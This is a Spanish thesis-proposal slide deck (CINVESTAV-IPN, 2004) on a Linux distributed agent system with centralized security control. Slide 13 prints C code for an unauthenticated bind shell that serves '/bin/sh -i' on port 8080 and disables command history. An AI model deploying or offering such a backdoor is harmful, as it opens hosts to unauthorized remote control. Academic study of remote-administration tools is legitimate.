Centro de Investigación y de Estudios Avanzad del IPN. Departamento de Ingeniería Eléctrica.

1. Centro de Investigación y de Estudios Avanzad del IPN. Departamento de Ingeniería Eléctrica. Sección de Computación   Sistema Distribuido de Agentes con Control Centralizado de seguridad. Tesista: Mario Irán Florentino Parra Hernández. Director de tesis: Dr. Jorge Buenabad Chávez. 09 / Nov. / 2004

2. Agenda. • Antecedentes. • Limitantes. • Objetivos. • Metodologia • Conograma. • Productos esperados. • Avances. • Referencias. Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

3. Antecedentes. • En los últimos años Internet a permitido nuevas formas de comunicación entre sistemas computacionales. • Por lo que se han creado mecanismos de seguridad que tratan de prevenir accesos sin autorización como son: Protección perimetral (firewalls). Sistemas de Detección de Intrusos ( SDIs). Antivirus. VPN. Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

4. Antecedentes ( Cont.) • El crecimiento del Internet implica riesgos de seguridad en los sistemas computacionales por eventos maliciosos como son: • Personas no autorizadas que acceden desde Internet. • Virus Informático se encuentran en constante acoso a sistemas desde Internet. • Usuarios autorizados que intentan tener privilegios adicionales. • Usuarios abusan de los privilegios otorgados Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

5. Limitantes. • Las limitantes que presentan los sistemas de seguridad es su Confiabilidad. • Trabajan con reglas de seguridad que con el tiempo tienden hacer obsoletas.

6. Objetivos • Objetivo General. Desarrollar un sistema distribuido de agentes con control centralizado que administre la seguridad en sistemas distribuidos en plataforma LINUX. • Objetivo Particular. • Implementar agentes en sistemas red en plataforma LINUX que administren la seguridad en cada estación de trabajo. • Implementación de una interfaz grafica que administre a los agentes mediante protocolos de comunicación y autentificación.

7. Internet Internet Esquematización. Red interna CONTROL CENTRALIZADO Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

8. Metodologia. • Etapa 1 Análisis y selección. Agentes. Obtención de privilegio de en Linux. Protocolos de Comunicación y Autentificación. GTK. • Etapa 2 Diseño • Etapa 3 Implementación. • Etapa 4 Pruebas. • Etapa 5 Documentación de la tesis.

9. Etapa 1 2 3 4 5 6 7 8 9 10 11 Análisis y Selección. ( Desarrollo de Protocolo) Diseño. Implementación. Pruebas. Documentación. Cronograma Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

10. Productos esperados. • Desarrollo de Agentes sobre Linux. • Desarrollo del Control Centralizado administrador de los agentes. Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

11. Avance Trabajo Relacionado. • Back Orifice. • Es una pequeña utilidad para el control remoto de equipos. • Se compone basicamente de dos elementos: el cliente y el servidor. • Controlar remotamente estaciones Windows. • Desarrollado por un grupo de Hacker que se hacen llamar Cult of the Dead Cow. • Se distribuyen como si fuera un virus por lo que no es muy confiable. Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

12. Avance (Cont.) Back Orifice. Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

13. Avace (Cont). UNIX Network Programming #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/wait.h> #include <netinet/in.h> #include <signal.h> #include <string.h> #define DEFAULT_PORT 8080 int main(int argc,char **argv) { char *name[3];char *env[2]; int fd,fd2,fromlen; int port; struct sockaddr_in serv; unsigned char *ptr; port=DEFAULT_PORT; signal(SIGCHLD,sig_hand); if((fd=socket(AF_INET,SOCK_STREAM,0))<0) { exit(1); } serv.sin_addr.s_addr=0; serv.sin_port=htons(port); serv.sin_family=AF_INET; if(bind(fd,(struct sockaddr *)&serv,16)) { exit(1); } if(listen(fd,5)) { exit(1); } for(;;) { fromlen=sizeof(struct sockaddr); fd2=accept(fd,(struct sockaddr *)&serv,&fromlen); if (fd2<0) continue; if (fork()) { close(fd2); } else { close(fd); /* Se redirecciona la entrada y salida*/ dup2(fd2,0); dup2(fd2,1); dup2(fd2,2); name[0]="/bin/sh"; name[1]="-i"; name[2]=NULL; env[0]="HISTFILE=/dev/null"; env[1]=NULL; execve(name[0],name,env); exit(1); } } } Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

14. Avance (Cont). AgentBuilder • Herramienta para el desarrollo de software basado en agentes tanto de carácter  comercial como académico. http://www.agentbuilder.com/ Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

15. Referencias • UNIX Network Programming, Volume 1, Second Edition: Networking APIs: Sockets and XTI, Prentice Hall, 1998. Richard Stevens. • UNIX Network Programming, Volume 2, Second Edition: Interprocess Communications, Prentice Hall, 1999. Richard Stevens. • Allen Julie, et al, “State of the Practice of Intrusion Detection Technologies”, Carnegie Mellon Software Enginneering Institute, January 2000. • Caswell Brian, Roesh Marty, Snort The Open Source Network Intrusion Detection System, 2004. Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004